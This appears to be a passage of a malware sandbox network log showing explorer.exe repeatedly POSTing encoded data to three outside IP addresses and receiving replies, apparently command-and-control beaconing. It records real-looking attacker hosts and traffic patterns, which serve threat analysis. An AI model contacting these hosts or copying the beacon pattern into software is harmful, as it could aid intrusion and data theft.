ANIHbE531Xs/migvEZ+mnSBeJi6nTXfG2Y51E8OJfAKRkF8EoYOUy/OyO3B8dtH8cUyAzP0UA0YPu7d+BhKY6elwgEX9jKP02FThLndvoyuIBq33sm5BwwszdOCagRN746m6lavne8kGafrzRTVY26h3hwWDiZJrciiRHJUh8kptRxgmhOwiQTA+BKcaOfnY9U32onrCVx6oxVSJ0/W4n6vdcIUtcz9b2CPm0Bamrr51SnJO1JDBy3CJ86a1GZJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	62388	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:39 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:39 UTC	1122	OUT	Data Raw: 6a 4b 55 43 50 6c 4a 31 43 64 63 46 62 30 70 4f 4b 35 33 64 46 4c 6c 55 35 35 35 39 73 6c 72 63 4a 75 37 44 55 46 38 72 36 73 69 7a 78 4f 43 52 30 35 53 66 5a 72 70 35 6d 55 6e 4f 30 77 77 66 78 74 58 37 6c 7a 53 68 46 56 64 54 5a 6d 31 57 71 72 46 54 6b 48 67 58 69 7a 78 55 61 53 4a 58 68 75 54 61 4d 4a 70 6a 31 5a 69 6c 59 34 4a 2b 6f 66 37 36 72 6f 44 64 62 78 45 54 4e 43 68 43 79 5a 4e 79 69 39 59 51 31 53 50 44 4d 6f 4d 30 4e 38 70 61 39 6a 37 33 4e 33 75 69 6d 65 52 54 75 61 47 75 2f 78 43 31 35 32 39 4e 31 2b 57 48 4c 55 4e 45 35 74 4a 6d 76 2b 2b 70 74 47 67 2b 54 67 79 78 34 59 65 44 73 56 31 2b 35 2b 52 52 6e 58 63 64 6a 71 50 6e 53 44 35 76 35 68 46 77 30 75 6e 45 37 56 31 67 2b 68 53 6f 32 72 4c 6f 2f 5a 50 30 2f 70 53 61 4f 76 63 59 6b 66 44 Data Ascii: jKUCPlJ1CdcFb0pOK53dFLlU5559slrcJu7DUF8r6sizxOCR05SfZrp5mUnO0wwfxtX7lzShFVdTZm1WqrFTkHgXizxUaSJXhuTaMJpj1ZilY4J+of76roDdbxETNChCyZNyi9YQ1SPDMoM0N8pa9j73N3uimeRTuaGu/xC1529N1+WHLUNE5tJmv++ptGg+Tgyx4YeDsV1+5+RRnXcdjqPnSD5v5hFw0unE7V1g+hSo2rLo/ZP0/pSaOvcYkfD
2024-07-27 05:46:40 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:40 UTC	685	IN	Data Raw: 47 44 64 66 43 4f 65 69 4b 64 4c 4b 2f 53 52 6a 55 57 62 51 75 36 6b 71 31 49 78 52 68 7a 6e 54 74 6f 46 56 2b 4d 2f 4c 5a 46 6c 2f 7a 7a 74 79 6e 67 58 53 57 38 55 6e 30 6b 59 47 61 5a 44 55 61 5a 47 74 56 4a 35 37 37 58 44 49 54 54 68 48 62 6e 34 4e 47 52 56 61 36 38 4f 4a 68 45 4a 69 6e 36 72 69 54 45 62 45 38 36 69 74 34 67 69 43 37 55 6c 68 75 2f 68 42 50 71 2b 2f 78 56 52 78 6f 72 31 78 73 69 55 47 39 64 33 6e 2f 58 52 68 6c 54 46 30 55 4a 4f 61 72 72 35 57 70 6e 4c 6d 45 4f 4e 51 2f 49 6b 67 79 54 36 5a 6f 59 4d 66 67 50 64 50 70 38 45 4b 77 57 75 7a 75 73 6b 54 41 51 38 36 53 56 4c 30 76 38 66 39 48 64 6a 6a 55 39 58 62 78 61 39 76 2f 31 32 4c 68 33 7a 58 49 78 79 51 7a 65 70 78 55 4e 33 39 46 54 4f 55 2b 71 44 55 79 68 38 39 35 6e 6c 51 71 44 4a Data Ascii: GDdfCOeiKdLK/SRjUWbQu6kq1IxRhznTtoFV+M/LZFl/zztyngXSW8Un0kYGaZDUaZGtVJ577XDITThHbn4NGRVa68OJhEJin6riTEbE86it4giC7Ulhu/hBPq+/xVRxor1xsiUG9d3n/XRhlTF0UJOarr5WpnLmEONQ/IkgyT6ZoYMfgPdPp8EKwWuzuskTAQ86SVL0v8f9HdjjU9Xbxa9v/12Lh3zXIxyQzepxUN39FTOU+qDUyh895nlQqDJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	62390	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:41 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:41 UTC	1122	OUT	Data Raw: 49 61 39 5a 65 34 39 63 50 55 48 4e 4b 41 6e 6a 41 32 4b 30 41 54 4c 41 34 41 56 35 63 54 4f 33 43 2b 2b 66 43 64 77 61 38 32 65 36 59 2b 41 73 45 58 63 47 45 55 78 75 66 46 72 67 64 67 56 36 42 76 68 6f 65 77 75 69 5a 6d 32 32 62 6a 70 75 2f 34 4f 78 59 54 66 49 6a 70 69 45 51 44 44 64 74 6c 65 50 51 62 73 64 56 77 38 70 6c 4e 6e 4e 53 63 79 43 4c 78 79 55 46 42 55 68 70 32 74 66 33 41 43 31 77 58 43 50 76 70 68 4c 6a 55 76 57 2b 64 78 55 73 46 79 76 57 7a 2b 45 77 39 77 49 52 35 76 73 42 31 77 49 38 32 6f 74 74 65 38 77 6e 33 43 59 6e 56 53 50 65 73 47 41 57 76 6d 75 2b 77 53 4e 42 34 47 79 6a 64 58 31 72 36 59 43 52 7a 61 4e 62 65 43 70 63 6d 4a 78 77 63 48 7a 58 6d 77 43 4a 36 75 79 6b 61 61 6b 4d 44 54 62 46 43 35 66 4d 48 47 38 51 54 46 53 71 5a 46 Data Ascii: Ia9Ze49cPUHNKAnjA2K0ATLA4AV5cTO3C++fCdwa82e6Y+AsEXcGEUxufFrgdgV6BvhoewuiZm22bjpu/4OxYTfIjpiEQDDdtlePQbsdVw8plNnNScyCLxyUFBUhp2tf3AC1wXCPvphLjUvW+dxUsFyvWz+Ew9wIR5vsB1wI82otte8wn3CYnVSPesGAWvmu+wSNB4GyjdX1r6YCRzaNbeCpcmJxwcHzXmwCJ6uykaakMDTbFC5fMHG8QTFSqZF
2024-07-27 05:46:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:42 UTC	685	IN	Data Raw: 72 56 70 79 4e 36 58 4d 59 37 6c 61 31 4e 6d 63 75 62 37 73 71 4d 72 39 51 65 37 47 31 32 66 79 74 52 67 66 70 43 30 31 31 69 6c 30 57 56 52 74 4e 37 76 63 66 51 2b 55 59 51 73 51 6a 4c 58 79 4c 6c 6e 4a 51 31 2f 61 52 67 6f 4d 5a 43 51 77 4d 31 33 53 43 73 62 65 46 58 66 6a 33 2f 6f 4e 66 57 61 4a 48 6c 73 41 51 6f 70 48 34 41 7a 70 53 38 4a 2b 63 75 6b 77 71 57 72 39 2f 5a 31 44 78 4d 71 2f 37 39 30 30 2f 62 4c 69 35 39 76 5a 44 45 58 74 6d 78 72 64 78 6b 76 61 75 61 53 56 52 74 78 65 4a 4c 38 66 33 67 49 69 65 59 62 43 53 43 56 56 42 65 51 2f 44 44 66 79 6f 73 6b 6c 6e 79 5a 44 4c 47 54 54 79 69 7a 39 46 72 6f 50 39 66 2f 41 34 67 6f 62 62 49 74 77 79 42 4a 38 63 65 41 50 31 6f 7a 32 76 4e 74 74 39 47 4c 4c 34 4f 45 69 46 64 74 59 66 36 39 65 45 57 54 Data Ascii: rVpyN6XMY7la1Nmcub7sqMr9Qe7G12fytRgfpC011il0WVRtN7vcfQ+UYQsQjLXyLlnJQ1/aRgoMZCQwM13SCsbeFXfj3/oNfWaJHlsAQopH4AzpS8J+cukwqWr9/Z1DxMq/7900/bLi59vZDEXtmxrdxkvauaSVRtxeJL8f3gIieYbCSCVVBeQ/DDfyosklnyZDLGTTyiz9FroP9f/A4gobbItwyBJ8ceAP1oz2vNtt9GLL4OEiFdtYf69eEWT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	62392	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:43 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:43 UTC	1122	OUT	Data Raw: 47 65 75 6c 52 39 4b 5a 62 59 7a 32 49 68 58 2f 65 47 6b 6b 4d 72 77 63 50 43 31 78 6a 4f 59 59 50 36 61 6d 78 39 7a 42 73 62 74 4b 58 4c 7a 64 39 79 6e 4d 34 65 55 37 35 4b 41 39 68 73 6c 2b 52 74 74 72 5a 46 70 6f 73 37 50 2b 76 56 42 38 4c 64 38 64 48 7a 35 37 75 54 6b 69 4e 64 47 54 6a 2b 79 62 6d 76 50 57 41 43 4c 37 76 49 47 6b 61 74 34 71 6d 37 68 78 34 4f 2b 52 7a 30 68 47 30 79 6e 76 38 73 48 62 6f 61 41 5a 32 51 6e 46 44 75 48 55 4c 71 47 4c 37 2b 64 43 6c 4d 57 66 55 7a 4a 35 79 44 38 7a 6a 67 53 33 4e 57 69 4a 36 30 6d 53 30 5a 71 74 66 4f 4c 72 2f 67 74 65 30 46 5a 65 58 74 4e 30 41 6b 78 69 42 56 6a 5a 72 78 44 6b 6f 64 34 6d 65 44 4b 64 34 4b 68 71 50 67 78 42 76 79 64 67 66 55 43 6b 78 53 44 77 62 62 31 79 2b 63 68 44 39 4a 30 30 69 41 54 Data Ascii: GeulR9KZbYz2IhX/eGkkMrwcPC1xjOYYP6amx9zBsbtKXLzd9ynM4eU75KA9hsl+RttrZFpos7P+vVB8Ld8dHz57uTkiNdGTj+ybmvPWACL7vIGkat4qm7hx4O+Rz0hG0ynv8sHboaAZ2QnFDuHULqGL7+dClMWfUzJ5yD8zjgS3NWiJ60mS0ZqtfOLr/gte0FZeXtN0AkxiBVjZrxDkod4meDKd4KhqPgxBvydgfUCkxSDwbb1y+chD9J00iAT
2024-07-27 05:46:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:44 UTC	685	IN	Data Raw: 52 2f 43 6b 39 6c 61 35 74 65 56 39 54 31 56 6c 42 31 66 34 55 4a 6a 6a 37 30 31 52 71 37 71 4e 4d 35 62 77 65 69 73 57 6c 77 78 55 63 6d 42 53 66 30 68 74 57 33 41 5a 59 4c 4c 58 46 46 7a 58 43 65 43 33 34 70 4b 41 41 77 76 4e 4e 64 2f 52 41 6c 65 4a 49 53 47 48 68 36 76 6f 65 4c 4f 49 68 68 59 46 36 78 75 49 2b 73 30 34 73 34 63 63 39 53 75 57 76 59 2b 38 6c 37 45 43 4d 70 70 39 50 49 78 56 47 31 4c 56 74 42 79 71 2b 6a 6e 4c 79 43 76 51 45 52 31 65 52 73 30 77 77 71 36 54 47 79 66 5a 59 78 37 77 68 30 34 39 31 52 6b 4e 63 43 54 57 70 65 43 76 4c 35 67 67 71 54 6e 43 33 6f 71 43 63 4f 4e 46 47 6e 65 63 65 74 6b 41 73 2f 56 39 31 72 77 32 43 32 46 34 4c 45 38 37 31 71 4b 78 6f 58 30 4f 48 54 72 47 4a 41 6c 62 78 32 4f 45 31 66 51 78 69 4a 78 34 35 67 46 Data Ascii: R/Ck9la5teV9T1VlB1f4UJjj701Rq7qNM5bweisWlwxUcmBSf0htW3AZYLLXFFzXCeC34pKAAwvNNd/RAleJISGHh6voeLOIhhYF6xuI+s04s4cc9SuWvY+8l7ECMpp9PIxVG1LVtByq+jnLyCvQER1eRs0wwq6TGyfZYx7wh0491RkNcCTWpeCvL5ggqTnC3oqCcONFGnecetkAs/V91rw2C2F4LE871qKxoX0OHTrGJAlbx2OE1fQxiJx45gF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	62393	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:45 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:45 UTC	1267	OUT	Data Raw: 65 42 73 4a 65 42 33 69 45 45 56 43 48 72 78 6d 39 34 4b 7a 2b 67 6c 45 78 45 30 58 53 45 76 59 62 4a 6c 4e 6f 2f 45 5a 68 75 43 7a 4b 79 49 59 42 34 73 71 50 6e 2f 43 63 58 71 6b 30 4a 2b 44 47 76 4c 70 74 75 4e 5a 38 33 32 36 37 46 77 4a 4e 6b 66 68 41 50 43 55 6a 71 6a 6a 33 6a 64 5a 4c 44 71 30 76 4e 38 65 44 46 43 54 6b 37 36 78 33 56 45 50 70 56 45 32 50 66 6b 77 51 77 44 41 73 64 33 4b 7a 68 66 35 4e 71 54 42 77 63 38 48 44 42 4a 61 57 4e 5a 62 2b 6e 7a 38 73 47 6e 6d 49 32 68 55 50 56 56 6a 31 58 31 34 47 67 62 69 49 39 31 53 46 35 6d 47 78 39 71 4a 34 7a 67 78 49 63 56 59 65 44 76 50 46 36 49 53 34 74 70 44 63 41 51 35 71 55 38 62 74 52 62 52 31 54 2f 47 64 69 59 2f 51 56 66 6d 64 32 7a 58 44 64 4e 30 69 70 2f 5a 7a 4d 4d 53 69 49 43 31 76 2b 72 Data Ascii: eBsJeB3iEEVCHrxm94Kz+glExE0XSEvYbJlNo/EZhuCzKyIYB4sqPn/CcXqk0J+DGvLptuNZ83267FwJNkfhAPCUjqjj3jdZLDq0vN8eDFCTk76x3VEPpVE2PfkwQwDAsd3Kzhf5NqTBwc8HDBJaWNZb+nz8sGnmI2hUPVVj1X14GgbiI91SF5mGx9qJ4zgxIcVYeDvPF6IS4tpDcAQ5qU8btRbR1T/GdiY/QVfmd2zXDdN0ip/ZzMMSiIC1v+r
2024-07-27 05:46:47 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:47 UTC	685	IN	Data Raw: 76 50 61 71 6d 46 5a 4f 64 73 49 62 2b 6d 70 68 74 78 6d 2b 6d 6f 58 45 6e 2f 75 62 59 36 72 41 71 37 44 75 37 6a 56 43 6b 39 6a 4d 66 56 63 57 4f 74 69 35 55 6e 68 70 32 39 71 74 31 2f 77 77 5a 44 45 78 6a 49 74 4c 2b 63 31 76 61 4a 57 69 51 55 70 72 33 65 4c 36 70 74 55 39 51 63 35 44 5a 33 6f 68 52 73 61 68 38 69 61 70 36 57 74 4c 79 36 6a 54 4f 59 2b 61 4d 50 51 34 6d 4c 41 59 65 41 6d 73 41 62 54 77 56 31 34 31 48 43 4c 71 71 35 70 69 55 59 66 38 49 65 71 7a 58 42 48 62 37 45 77 5a 6b 75 66 61 55 7a 71 6b 4a 55 6b 51 75 4c 56 31 72 63 77 4b 75 79 53 51 75 48 7a 6d 64 49 32 50 56 41 6d 6a 33 4a 66 77 48 6f 61 70 38 6a 4a 43 4a 74 79 57 48 75 67 73 52 34 62 62 4a 74 69 33 44 42 35 38 65 6e 71 50 4a 4e 32 61 59 73 54 46 34 49 69 39 52 57 4b 56 4f 47 48 Data Ascii: vPaqmFZOdsIb+mphtxm+moXEn/ubY6rAq7Du7jVCk9jMfVcWOti5Unhp29qt1/wwZDExjItL+c1vaJWiQUpr3eL6ptU9Qc5DZ3ohRsah8iap6WtLy6jTOY+aMPQ4mLAYeAmsAbTwV141HCLqq5piUYf8IeqzXBHb7EwZkufaUzqkJUkQuLV1rcwKuySQuHzmdI2PVAmj3JfwHoap8jJCJtyWHugsR4bbJti3DB58enqPJN2aYsTF4Ii9RWKVOGH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	62394	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:48 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:48 UTC	1122	OUT	Data Raw: 41 33 70 37 78 6c 56 65 34 73 36 4b 6c 48 71 66 2f 67 71 55 7a 77 4c 59 67 55 7a 32 39 70 2f 56 58 49 54 70 6f 64 49 72 4e 6e 71 2f 51 6c 58 69 75 4a 77 55 49 6c 53 75 63 61 74 75 55 67 41 4e 4f 52 59 79 36 30 43 78 45 54 4b 75 43 55 77 59 36 4a 41 53 36 4e 67 46 69 57 32 57 71 33 55 43 4f 75 6d 48 57 33 42 43 6c 4f 61 43 7a 61 77 7a 44 35 67 37 76 4e 4c 71 2f 5a 58 53 35 42 32 42 39 77 64 30 62 78 45 45 51 74 54 32 49 62 44 77 79 63 55 55 35 55 79 58 71 78 72 6f 44 43 39 53 73 59 30 52 6a 63 52 34 53 73 48 76 51 6a 69 4e 6e 6d 6d 49 67 48 37 6d 78 69 4a 32 39 6c 6b 45 68 77 55 55 42 50 73 4e 73 69 52 55 51 78 54 54 44 53 41 47 35 68 52 4c 61 51 48 44 78 4e 4a 4d 58 2b 74 50 4c 62 35 63 6d 36 6a 39 72 59 57 6a 46 49 47 53 63 32 45 4d 7a 73 76 56 31 36 39 Data Ascii: A3p7xlVe4s6KlHqf/gqUzwLYgUz29p/VXITpodIrNnq/QlXiuJwUIlSucatuUgANORYy60CxETKuCUwY6JAS6NgFiW2Wq3UCOumHW3BClOaCzawzD5g7vNLq/ZXS5B2B9wd0bxEEQtT2IbDwycUU5UyXqxroDC9SsY0RjcR4SsHvQjiNnmmIgH7mxiJ29lkEhwUUBPsNsiRUQxTTDSAG5hRLaQHDxNJMX+tPLb5cm6j9rYWjFIGSc2EMzsvV169
2024-07-27 05:46:49 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:49 UTC	685	IN	Data Raw: 51 47 75 70 58 35 79 78 45 7a 50 45 38 62 30 54 79 78 54 4c 78 47 63 4f 4f 39 53 72 6d 4f 31 48 79 7a 50 63 52 6d 38 69 76 61 77 30 79 46 74 61 56 2b 47 4a 43 30 73 4d 45 32 63 33 6f 59 75 33 30 69 33 6e 42 52 37 4b 51 4b 74 7a 48 75 6d 6e 45 53 2b 35 6c 30 45 51 4e 44 64 79 63 42 6a 67 46 76 54 63 41 57 63 41 57 72 49 42 5a 39 63 49 4b 34 52 62 59 61 36 58 53 6f 64 5a 42 76 39 43 36 42 41 49 73 47 67 45 6a 45 66 74 7a 78 32 74 43 2b 77 36 7a 6d 2f 75 41 63 68 57 6d 4a 6f 58 51 78 54 4b 4b 30 4e 50 4e 4b 36 63 7a 77 34 36 4e 36 34 73 70 58 5a 4e 30 42 2f 6c 64 33 69 78 72 6e 70 6b 58 6c 66 77 7a 5a 78 30 64 6e 70 58 4f 50 36 77 51 4f 33 52 48 2f 78 45 50 54 32 41 55 6e 4d 74 44 6d 61 4a 61 46 4d 58 62 55 39 39 6d 31 5a 38 4b 4b 47 39 5a 64 4a 45 6a 61 6a Data Ascii: QGupX5yxEzPE8b0TyxTLxGcOO9SrmO1HyzPcRm8ivaw0yFtaV+GJC0sME2c3oYu30i3nBR7KQKtzHumnES+5l0EQNDdycBjgFvTcAWcAWrIBZ9cIK4RbYa6XSodZBv9C6BAIsGgEjEftzx2tC+w6zm/uAchWmJoXQxTKK0NPNK6czw46N64spXZN0B/ld3ixrnpkXlfwzZx0dnpXOP6wQO3RH/xEPT2AUnMtDmaJaFMXbU99m1Z8KKG9ZdJEjaj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	62395	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:49 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:49 UTC	1122	OUT	Data Raw: 6b 6b 49 42 7a 6e 75 58 57 65 75 4b 69 41 36 2b 65 41 44 68 62 6f 41 50 50 6f 6a 79 66 4d 55 53 71 71 62 41 39 46 71 2b 6b 38 36 4a 4f 6d 52 51 5a 5a 67 6a 78 36 75 42 6d 74 43 52 46 67 50 46 77 62 57 79 43 49 79 57 43 74 72 62 71 56 47 4d 4b 33 4b 42 52 62 2f 6c 72 6a 6e 71 6b 58 53 4b 6e 45 2f 37 63 75 53 61 4e 72 65 56 70 72 6c 33 45 69 37 63 36 6b 45 32 35 61 43 48 32 5a 58 46 2b 33 67 73 37 65 6b 31 63 78 2f 44 6b 4c 78 6e 76 35 73 79 39 6f 37 63 7a 5a 6a 51 61 72 73 46 77 4f 55 4c 68 47 71 49 61 43 75 6a 61 37 6b 54 37 43 4b 68 39 33 4e 67 36 6a 63 56 65 73 72 54 52 57 67 67 44 49 46 55 46 4f 70 79 62 69 73 5a 67 58 6b 63 53 37 39 54 45 4e 51 54 6a 66 76 70 2b 31 53 5a 70 64 67 75 67 34 30 51 30 50 31 68 46 51 6a 76 62 37 79 67 6e 68 49 77 71 6d 4f Data Ascii: kkIBznuXWeuKiA6+eADhboAPPojyfMUSqqbA9Fq+k86JOmRQZZgjx6uBmtCRFgPFwbWyCIyWCtrbqVGMK3KBRb/lrjnqkXSKnE/7cuSaNreVprl3Ei7c6kE25aCH2ZXF+3gs7ek1cx/DkLxnv5sy9o7czZjQarsFwOULhGqIaCuja7kT7CKh93Ng6jcVesrTRWggDIFUFOpybisZgXkcS79TENQTjfvp+1SZpdgug40Q0P1hFQjvb7ygnhIwqmO
2024-07-27 05:46:51 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:51 UTC	685	IN	Data Raw: 67 2f 77 69 4b 69 37 46 4a 4a 47 54 76 75 6a 33 47 6c 58 39 42 39 7a 64 7a 31 4e 6e 45 57 4f 70 72 69 6c 65 6d 52 4b 67 69 66 49 4a 6a 30 55 4c 2b 7a 50 31 55 53 2b 62 34 36 41 77 36 47 4c 54 57 4d 55 54 38 73 7a 31 44 64 48 4e 4b 4e 74 30 4e 4c 67 30 4e 43 59 6d 72 37 59 78 4f 4d 4f 2f 74 4b 37 35 35 52 30 43 76 62 49 34 66 43 46 64 54 57 4f 41 44 32 56 2b 4c 48 69 4d 65 61 31 55 37 5a 32 4a 4b 77 53 6e 6b 6e 79 34 49 4a 72 67 4c 32 79 33 59 46 4b 74 35 43 71 58 68 53 6e 6e 50 2b 4f 2b 38 4c 48 32 47 69 68 47 73 7a 76 6d 51 7a 69 52 45 70 6f 52 78 5a 76 48 5a 6e 6b 62 55 68 5a 6d 62 6b 45 70 5a 70 4e 66 6d 74 4c 71 68 41 44 78 75 61 64 4f 50 53 44 69 4e 72 33 48 47 74 63 55 66 32 43 79 57 45 75 56 77 50 4d 34 52 34 4b 65 36 32 43 7a 43 39 39 59 74 37 63 Data Ascii: g/wiKi7FJJGTvuj3GlX9B9zdz1NnEWOprilemRKgifIJj0UL+zP1US+b46Aw6GLTWMUT8sz1DdHNKNt0NLg0NCYmr7YxOMO/tK755R0CvbI4fCFdTWOAD2V+LHiMea1U7Z2JKwSnkny4IJrgL2y3YFKt5CqXhSnnP+O+8LH2GihGszvmQziREpoRxZvHZnkbUhZmbkEpZpNfmtLqhADxuadOPSDiNr3HGtcUf2CyWEuVwPM4R4Ke62CzC99Yt7c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	62396	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:52 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:52 UTC	1122	OUT	Data Raw: 71 33 78 6e 4b 63 48 76 36 4a 45 38 70 56 74 31 46 56 6b 66 53 52 59 57 41 4e 36 63 6e 78 4e 4c 67 6b 44 50 66 6d 65 41 6d 72 56 6d 33 74 45 71 37 35 4d 53 2f 4d 44 2b 35 72 44 5a 52 62 63 79 58 2f 2b 59 71 62 39 42 32 53 76 4c 4f 76 37 43 43 6c 6a 4a 70 48 4e 71 66 61 42 6d 4f 4a 5a 55 52 4a 39 70 69 64 4a 44 59 45 6d 42 30 58 33 54 2b 73 45 53 58 72 65 4f 6d 44 34 46 47 53 4b 6c 32 55 4c 51 4e 48 46 58 51 43 39 74 69 37 35 41 68 48 6d 4d 61 73 6b 51 52 51 6e 57 30 79 37 6c 57 42 66 55 74 39 67 7a 6c 62 72 54 6c 50 71 2f 50 63 35 68 31 39 31 6b 63 66 48 37 63 30 4c 63 6a 32 54 38 4e 76 36 65 50 76 6c 59 48 4e 70 2b 45 4a 37 31 43 54 72 6b 6a 69 78 68 4b 66 4b 75 4b 58 46 4b 71 61 4c 68 46 42 47 41 4a 66 6a 41 6e 31 72 37 37 59 35 6a 76 4f 6a 49 32 4b 78 Data Ascii: q3xnKcHv6JE8pVt1FVkfSRYWAN6cnxNLgkDPfmeAmrVm3tEq75MS/MD+5rDZRbcyX/+Yqb9B2SvLOv7CCljJpHNqfaBmOJZURJ9pidJDYEmB0X3T+sESXreOmD4FGSKl2ULQNHFXQC9ti75AhHmMaskQRQnW0y7lWBfUt9gzlbrTlPq/Pc5h191kcfH7c0Lcj2T8Nv6ePvlYHNp+EJ71CTrkjixhKfKuKXFKqaLhFBGAJfjAn1r77Y5jvOjI2Kx
2024-07-27 05:46:53 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:53 UTC	685	IN	Data Raw: 74 6b 4b 72 47 4a 71 73 6a 2f 76 56 72 55 66 44 4a 31 6d 37 52 73 43 31 36 33 38 48 69 4b 37 78 77 63 73 57 65 77 65 65 65 37 39 50 44 41 43 44 7a 54 55 6e 38 36 57 77 2f 76 4b 41 65 74 48 4d 38 4e 46 49 52 4a 55 54 49 63 6b 42 4b 4f 5a 73 62 6b 51 46 4b 6e 41 56 6d 35 7a 6c 69 38 38 31 42 50 59 48 65 31 66 50 37 69 66 72 67 2f 70 70 38 6b 41 56 2b 76 49 39 4a 72 76 6e 53 76 4a 49 51 51 4f 54 52 71 77 6b 49 6b 41 75 48 4b 49 55 7a 52 64 64 4a 4f 72 30 47 79 48 43 58 6c 49 47 46 52 30 31 43 54 32 47 6c 59 69 77 61 35 69 37 78 74 48 45 6d 70 77 4f 6f 4d 67 47 45 42 77 30 66 52 58 73 50 67 6e 30 72 74 43 43 59 4e 39 34 30 6b 31 2b 50 45 4b 44 32 58 39 6a 47 5a 47 73 51 32 61 37 43 6e 61 6c 43 48 39 48 57 5a 36 78 46 75 61 5a 55 52 65 51 6e 6a 38 4f 75 48 4e Data Ascii: tkKrGJqsj/vVrUfDJ1m7RsC1638HiK7xwcsWeweee79PDACDzTUn86Ww/vKAetHM8NFIRJUTIckBKOZsbkQFKnAVm5zli881BPYHe1fP7ifrg/pp8kAV+vI9JrvnSvJIQQOTRqwkIkAuHKIUzRddJOr0GyHCXlIGFR01CT2GlYiwa5i7xtHEmpwOoMgGEBw0fRXsPgn0rtCCYN940k1+PEKD2X9jGZGsQ2a7CnalCH9HWZ6xFuaZUReQnj8OuHN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	62398	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:54 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
